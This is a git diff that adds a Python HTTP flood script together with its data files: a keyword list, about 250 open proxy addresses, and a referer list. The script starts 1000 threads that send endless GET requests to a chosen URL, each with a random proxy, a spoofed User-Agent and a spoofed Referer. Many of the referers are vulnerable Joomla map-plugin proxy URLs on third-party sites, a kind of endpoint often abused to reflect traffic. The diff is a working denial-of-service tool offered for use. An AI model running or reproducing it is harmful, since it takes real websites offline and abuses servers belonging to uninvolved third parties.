diff --git a/goodwin.py b/goodwin.py new file mode 100644 index 0000000..71ed116 --- /dev/null +++ b/goodwin.py @@ -0,0 +1,77 @@ +# -*- coding: utf-8 -*- +import sys +import os +import threading +import random +import requests +import time +import string +from threading import Thread + +#naming the files +proxy_file = 'proxy.txt' +ua_file = 'user-agents.txt' +ref_file = 'referers.txt' +keywords_file = 'keywords.txt' +#initializing variables +url = sys.argv[1] +#trying to find and parse file with proxies +try: + if os.stat(proxy_file).st_size > 0: + with open(proxy_file) as proxy: + ips = [row.rstrip() for row in proxy] + else: + print('Error: File %s is empty!' % proxy_file) +except OSError: + print('Error: %s was not found!' % proxy_file) +#trying to find and parse file with User-Agents +try: + if os.stat(ua_file).st_size > 0: + with open(ua_file) as user_agents: + ua = [row.rstrip() for row in user_agents] + else: + print('Error: File %s is empty' % ua_file) +except OSError: + print('Error: %s was not found!' % ua_file) +#trying to find and parse file with referers +try: + if os.stat(ref_file).st_size > 0: + with open(ref_file) as referers: + ref = [row.rstrip() for row in referers] + else: + print('Error: File %s is empty!' % ref_file) +except OSError: + print('Error: %s was not found!' % ref_file) +#trying to find and parse file with keywords +try: + if os.stat(keywords_file).st_size > 0: + with open(keywords_file) as keywords: + keyword = [row.rstrip() for row in keywords] + else: + print('Error: File %s is empty!' % keywords_file) +except OSError: + print('Error: %s was not found!' % keywords_file) +# +print('Loaded: {} proxies, {} user-agents, {} referers, {} keywords'.format(len(ips), len(ua), len(ref), len(keyword))) +print('Start sending requests...') + +def buildblock(size): + return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size)) + +class HTTPThread(threading.Thread): + def run(self): + while True: + payload = {random.choice(keyword): random.choice(keyword)} + headers = {'User-Agent': random.choice(ua), + 'Referer': url+'/?ref='+random.choice(keyword)} + index = random.randint(0,len(ips)-1) + proxies = {'http': ips[index]} + try: + r = requests.get(url, params=payload, headers=headers, proxies=proxies) + except Exception as ex: + pass + + +for i in range(1000): + t = HTTPThread() + t.start() \ No newline at end of file diff --git a/keywords.txt b/keywords.txt new file mode 100644 index 0000000..99cdb54 --- /dev/null +++ b/keywords.txt @@ -0,0 +1,1000 @@ +the +of +to +and +a +in +is +it +you +that +he +was +for +on +are +with +as +I +his +they +be +at +one +have +this +from +or +had +by +hot +word +but +what +some +we +can +out +other +were +all +there +when +up +use +your +how +said +an +each +she +which +do +their +time +if +will +way +about +many +then +them +write +would +like +so +these +her +long +make +thing +see +him +two +has +look +more +day +could +go +come +did +number +sound +no +most +people +my +over +know +water +than +call +first +who +may +down +side +been +now +find +any +new +work +part +take +get +place +made +live +where +after +back +little +only +round +man +year +came +show +every +good +me +give +our +under +name +very +through +just +form +sentence +great +think +say +help +low +line +differ +turn +cause +much +mean +before +move +right +boy +old +too +same +tell +does +set +three +want +air +well +also +play +small +end +put +home +read +hand +port +large +spell +add +even +land +here +must +big +high +such +follow +act +why +ask +men +change +went +light +kind +off +need +house +picture +try +us +again +animal +point +mother +world +near +build +self +earth +father +head +stand +own +page +should +country +found +answer +school +grow +study +still +learn +plant +cover +food +sun +four +between +state +keep +eye +never +last +let +thought +city +tree +cross +farm +hard +start +might +story +saw +far +sea +draw +left +late +run +don't +while +press +close +night +real +life +few +north +open +seem +together +next +white +children +begin +got +walk +example +ease +paper +group +always +music +those +both +mark +often +letter +until +mile +river +car +feet +care +second +book +carry +took +science +eat +room +friend +began +idea +fish +mountain +stop +once +base +hear +horse +cut +sure +watch +color +face +wood +main +enough +plain +girl +usual +young +ready +above +ever +red +list +though +feel +talk +bird +soon +body +dog +family +direct +pose +leave +song +measure +door +product +black +short +numeral +class +wind +question +happen +complete +ship +area +half +rock +order +fire +south +problem +piece +told +knew +pass +since +top +whole +king +space +heard +best +hour +better +true +during +hundred +five +remember +step +early +hold +west +ground +interest +reach +fast +verb +sing +listen +six +table +travel +less +morning +ten +simple +several +vowel +toward +war +lay +against +pattern +slow +center +love +person +money +serve +appear +road +map +rain +rule +govern +pull +cold +notice +voice +unit +power +town +fine +certain +fly +fall +lead +cry +dark +machine +note +wait +plan +figure +star +box +noun +field +rest +correct +able +pound +done +beauty +drive +stood +contain +front +teach +week +final +gave +green +oh +quick +develop +ocean +warm +free +minute +strong +special +mind +behind +clear +tail +produce +fact +street +inch +multiply +nothing +course +stay +wheel +full +force +blue +object +decide +surface +deep +moon +island +foot +system +busy +test +record +boat +common +gold +possible +plane +stead +dry +wonder +laugh +thousand +ago +ran +check +game +shape +equate +hot +miss +brought +heat +snow +tire +bring +yes +distant +fill +east +paint +language +among +grand +ball +yet +wave +drop +heart +am +present +heavy +dance +engine +position +arm +wide +sail +material +size +vary +settle +speak +weight +general +ice +matter +circle +pair +include +divide +syllable +felt +perhaps +pick +sudden +count +square +reason +length +represent +art +subject +region +energy +hunt +probable +bed +brother +egg +ride +cell +believe +fraction +forest +sit +race +window +store +summer +train +sleep +prove +lone +leg +exercise +wall +catch +mount +wish +sky +board +joy +winter +sat +written +wild +instrument +kept +glass +grass +cow +job +edge +sign +visit +past +soft +fun +bright +gas +weather +month +million +bear +finish +happy +hope +flower +clothe +strange +gone +jump +baby +eight +village +meet +root +buy +raise +solve +metal +whether +push +seven +paragraph +third +shall +held +hair +describe +cook +floor +either +result +burn +hill +safe +cat +century +consider +type +law +bit +coast +copy +phrase +silent +tall +sand +soil +roll +temperature +finger +industry +value +fight +lie +beat +excite +natural +view +sense +ear +else +quite +broke +case +middle +kill +son +lake +moment +scale +loud +spring +observe +child +straight +consonant +nation +dictionary +milk +speed +method +organ +pay +age +section +dress +cloud +surprise +quiet +stone +tiny +climb +cool +design +poor +lot +experiment +bottom +key +iron +single +stick +flat +twenty +skin +smile +crease +hole +trade +melody +trip +office +receive +row +mouth +exact +symbol +die +least +trouble +shout +except +wrote +seed +tone +join +suggest +clean +break +lady +yard +rise +bad +blow +oil +blood +touch +grew +cent +mix +team +wire +cost +lost +brown +wear +garden +equal +sent +choose +fell +fit +flow +fair +bank +collect +save +control +decimal +gentle +woman +captain +practice +separate +difficult +doctor +please +protect +noon +whose +locate +ring +character +insect +caught +period +indicate +radio +spoke +atom +human +history +effect +electric +expect +crop +modern +element +hit +student +corner +party +supply +bone +rail +imagine +provide +agree +thus +capital +won't +chair +danger +fruit +rich +thick +soldier +process +operate +guess +necessary +sharp +wing +create +neighbor +wash +bat +rather +crowd +corn +compare +poem +string +bell +depend +meat +rub +tube +famous +dollar +stream +fear +sight +thin +triangle +planet +hurry +chief +colony +clock +mine +tie +enter +major +fresh +search +send +yellow +gun +allow +print +dead +spot +desert +suit +current +lift +rose +continue +block +chart +hat +sell +success +company +subtract +event +particular +deal +swim +term +opposite +wife +shoe +shoulder +spread +arrange +camp +invent +cotton +born +determine +quart +nine +truck +noise +level +chance +gather +shop +stretch +throw +shine +property +column +molecule +select +wrong +gray +repeat +require +broad +prepare +salt +nose +plural +anger +claim +continent +oxygen +sugar +death +pretty +skill +women +season +solution +magnet +silver +thank +branch +match +suffix +especially +fig +afraid +huge +sister +steel +discuss +forward +similar +guide +experience +score +apple +bought +led +pitch +coat +mass +card +band +rope +slip +win +dream +evening +condition +feed +tool +total +basic +smell +valley +nor +double +seat +arrive +master +track +parent +shore +division +sheet +substance +favor +connect +post +spend +chord +fat +glad +original +share +station +dad +bread +charge +proper +bar +offer +segment +slave +duck +instant +market +degree +populate +chick +dear +enemy +reply +drink +occur +support +speech +nature +range +steam +motion +path +liquid +log +meant +quotient +teeth +shell +neck \ No newline at end of file diff --git a/proxy.txt b/proxy.txt new file mode 100644 index 0000000..8b6cb7d --- /dev/null +++ b/proxy.txt @@ -0,0 +1,254 @@ +134.213.208.187:4444 +52.8.41.170:4444 +134.213.29.202:4444 +134.213.221.181:4444 +134.213.152.188:4444 +134.213.148.8:4444 +134.213.62.13:4444 +5.189.183.9:3128 +45.55.207.152:3128 +134.213.208.187:3129 +50.93.197.98:1080 +104.223.103.186:1080 +96.47.235.5:1080 +155.94.181.207:1080 +50.93.201.28:1080 +50.93.197.102:1080 +90.152.38.178:1080 +134.213.214.187:3129 +50.93.197.99:1080 +134.213.221.177:5070 +104.196.249.237:80 +5.189.162.211:3128 +144.217.186.69:80 +72.11.151.14:1080 +91.194.42.51:80 +96.47.235.3:1080 +155.94.181.217:1080 +86.105.53.81:3128 +94.177.252.34:3128 +158.69.157.32:8080 +104.223.103.185:1080 +46.137.177.213:80 +144.217.128.207:3128 +144.217.128.207:8080 +47.88.84.111:3128 +94.177.249.245:3128 +198.50.222.134:1080 +96.44.150.138:1080 +86.105.53.81:8080 +138.197.94.211:8080 +158.69.78.163:8080 +158.69.187.67:8080 +96.47.235.4:1080 +72.11.151.13:1080 +72.11.151.12:1080 +72.11.151.10:1080 +72.11.151.4:1080 +198.50.253.85:1080 +96.44.150.137:1080 +94.177.246.201:3128 +178.62.45.174:8118 +173.254.197.87:1080 +50.93.207.67:1080 +50.93.198.142:1080 +50.93.201.53:1080 +50.93.203.31:1080 +50.93.204.161:1080 +50.93.197.100:1080 +50.93.197.101:1080 +54.241.154.78:3392 +86.105.53.81:80 +134.213.62.13:3129 +149.56.30.100:8080 +159.203.140.194:8080 +159.203.78.145:8080 +94.177.246.201:8080 +94.177.246.201:80 +103.196.182.122:28425 +217.91.64.78:3128 +12.33.254.195:3128 +52.28.106.197:80 +139.59.190.124:8118 +188.166.156.245:8118 +47.52.2.135:8080 +104.199.228.65:80 +154.46.204.36:80 +79.104.54.82:8080 +119.18.153.110:8080 +137.135.166.225:8142 +109.201.191.127:8081 +187.11.201.236:3128 +125.141.200.6:80 +125.141.200.14:80 +79.120.123.171:8080 +84.196.169.161:80 +138.68.143.78:8118 +110.164.58.147:9001 +193.107.247.118:53281 +62.45.225.201:80 +125.141.200.44:80 +109.201.191.252:8081 +201.90.120.194:3128 +83.169.229.51:8080 +185.28.193.95:8080 +78.111.92.59:8080 +125.141.200.23:80 +125.141.200.46:80 +125.141.200.53:80 +94.242.59.123:8080 +163.121.188.3:8080 +47.88.241.9:137 +178.62.205.48:8080 +94.153.208.58:8080 +138.68.129.61:8118 +125.141.200.38:80 +94.154.57.5:9999 +85.174.236.106:3128 +186.208.122.154:3128 +179.155.233.163:80 +177.20.255.48:3128 +5.2.64.78:1080 +85.26.146.169:80 +125.141.200.52:80 +125.141.200.43:80 +125.141.200.35:80 +109.173.40.18:80 +119.28.12.218:8888 +187.33.226.58:80 +37.59.54.189:3128 +175.45.57.11:8080 +58.27.217.75:3128 +46.105.121.118:1080 +148.255.98.52:3128 +125.141.200.2:80 +89.253.161.207:80 +194.87.94.184:3128 +125.141.200.15:80 +45.55.207.152:80 +5.189.183.6:3128 +58.65.240.98:8080 +5.2.73.231:1080 +5.2.73.71:1080 +177.84.87.174:80 +212.188.244.123:8080 +125.141.200.47:80 +125.141.200.12:80 +78.155.193.226:8080 +5.2.75.32:1080 +82.221.48.137:8080 +213.157.249.154:8080 +112.104.175.136:8998 +113.53.230.195:3128 +61.15.249.81:8998 +125.141.200.51:80 +78.102.43.251:8080 +125.141.200.4:80 +83.239.58.162:8080 +177.55.158.18:3128 +163.121.188.2:8080 +202.73.51.102:80 +201.236.97.3:3128 +125.141.200.55:80 +122.212.129.9:80 +125.141.200.13:80 +190.144.114.124:3128 +81.23.0.41:3129 +190.102.151.235:8080 +196.202.255.66:80 +125.141.200.26:80 +210.91.48.121:3128 +168.63.20.19:8133 +177.135.200.146:3128 +177.84.87.154:80 +5.100.249.110:80 +46.101.253.140:3128 +200.123.138.229:8080 +200.229.202.72:8080 +88.159.109.104:80 +125.141.200.5:80 +177.7.193.123:3128 +162.243.202.25:80 +46.37.193.74:3128 +154.46.204.34:80 +200.92.152.130:8080 +113.252.236.96:8080 +125.141.200.7:80 +92.222.106.162:9999 +186.27.126.130:80 +153.149.166.219:3128 +178.33.42.158:3128 +125.16.240.197:8080 +46.37.193.74:8080 +181.49.171.178:3128 +125.141.200.39:80 +91.103.26.186:8080 +94.242.59.254:8080 +195.114.7.10:3127 +31.3.242.140:3128 +125.141.200.25:80 +125.141.200.24:80 +181.215.96.227:3128 +111.125.66.25:8080 +125.141.200.36:80 +125.141.200.40:80 +107.22.48.140:80 +221.249.116.202:8080 +5.2.75.15:1080 +192.198.85.158:80 +8.19.116.10:80 +162.243.207.236:8000 +159.8.114.37:8123 +201.164.154.102:8080 +202.73.51.102:8128 +87.236.233.182:808 +119.81.71.27:8123 +195.158.28.178:3128 +78.21.187.112:80 +80.87.81.102:80 +121.135.146.184:8080 +37.72.100.61:3128 +219.127.253.43:80 +92.47.195.250:3128 +37.187.100.23:3128 +84.31.23.35:80 +89.45.201.82:80 +178.33.105.213:3128 +159.8.114.37:25 +87.98.145.185:9999 +164.132.43.208:1080 +94.23.12.53:9001 +180.183.249.214:8080 +5.2.64.127:1080 +83.61.22.207:8080 +210.212.230.22:80 +49.231.245.213:80 +77.110.158.23:8080 +179.189.206.36:8080 +125.141.200.22:80 +125.141.200.45:80 +112.214.73.253:80 +213.57.89.97:18000 +181.41.197.63:80 +177.23.184.51:3128 +47.90.55.52:8118 +177.75.70.1:80 +47.88.240.209:137 +94.142.142.140:3128 +119.81.71.27:8880 +196.196.3.162:1080 +196.196.3.164:1080 +177.23.184.51:3128 +119.81.71.27:25 +78.23.56.114:80 +58.176.46.248:80 +41.32.14.252:3128 +89.140.125.17:80 +218.191.247.51:8380 +5.2.69.181:1080 +194.8.51.253:8080 +123.63.242.115:3128 +41.32.191.122:8080 +192.166.218.49:8888 +58.27.217.75:3128 +5.189.162.211:3128 \ No newline at end of file diff --git a/referers.txt b/referers.txt new file mode 100644 index 0000000..c620cc8 --- /dev/null +++ b/referers.txt @@ -0,0 +1,350 @@ +https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u= +https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u= +https://drive.google.com/viewerng/viewer?url= +http://www.google.com/translate?u= +https://developers.google.com/speed/pagespeed/insights/?url= +http://help.baidu.com/searchResult?keywords= +http://www.bing.com/search?q= +https://add.my.yahoo.com/rss?url= +https://play.google.com/store/search?q= +http://www.google.com/?q= +http://regex.info/exif.cgi?url= +http://anonymouse.org/cgi-bin/anon-www.cgi/ +http://www.google.com/translate?u= +http://translate.google.com/translate?u= +http://validator.w3.org/feed/check.cgi?url= +http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= +http://validator.w3.org/check?uri= +http://jigsaw.w3.org/css-validator/validator?uri= +http://validator.w3.org/checklink?uri= +http://www.w3.org/RDF/Validator/ARPServlet?URI= +http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= +http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= +http://validator.w3.org/mobile/check?docAddr= +http://validator.w3.org/p3p/20020128/p3p.pl?uri= +http://online.htmlvalidator.com/php/onlinevallite.php?url= +http://feedvalidator.org/check.cgi?url= +http://gmodules.com/ig/creator?url= +http://www.google.com/ig/adde?moduleurl= +http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= +http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= +http://host-tracker.com/check_page/?furl= +http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= +http://www.onlinewebcheck.com/check.php?url= +http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= +http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= +http://about42.nl/www/showheaders.php;POST;about42.nl.txt +http://browsershots.org;POST;browsershots.org.txt +http://streamitwebseries.twww.tv/proxy.php?url= +http://www.comicgeekspeak.com/proxy.php?url= +http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= +http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= +http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= +http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= +http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= +http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= +http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= +http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= +http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= +http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= +http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt +http://web-sniffer.net/?url= +http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= +http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= +http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= +http://translate.yandex.net/tr-url/ru-uk.uk/ +http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= +http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= +http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= +http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= +http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= +http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS +http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= +http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= +http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= +http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url= +http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url= +http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url= +http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url= +http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= +http://validator.w3.org/nu/?doc= +http://check-host.net/check-http?host= +http://www.netvibes.com/subscribe.php?url= +http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.google.com/ig/add?feedurl= +http://anonymouse.org/cgi-bin/anon-www.cgi/ +http://www.google.com/translate?u= +http://translate.google.com/translate?u= +http://validator.w3.org/feed/check.cgi?url= +http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= +http://validator.w3.org/check?uri= +http://jigsaw.w3.org/css-validator/validator?uri= +http://validator.w3.org/checklink?uri= +http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= +http://www.w3.org/RDF/Validator/ARPServlet?URI= +http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= +http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= +http://www.w3.org/services/tidy?docAddr= +http://validator.w3.org/mobile/check?docAddr= +http://validator.w3.org/p3p/20020128/p3p.pl?uri= +http://validator.w3.org/p3p/20020128/policy.pl?uri= +http://online.htmlvalidator.com/php/onlinevallite.php?url= +http://feedvalidator.org/check.cgi?url= +http://gmodules.com/ig/creator?url= +http://www.google.com/ig/adde?moduleurl= +http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= +http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= +http://host-tracker.com/check_page/?furl= +http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= +http://www.viewdns.info/ismysitedown/?domain= +http://www.onlinewebcheck.com/check.php?url= +http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= +http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= +http://about42.nl/www/showheaders.php;POST;about42.nl.txt +http://browsershots.org;POST;browsershots.org.txt +http://streamitwebseries.twww.tv/proxy.php?url= +http://www.comicgeekspeak.com/proxy.php?url= +http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= +http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= +http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= +http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= +http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= +http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 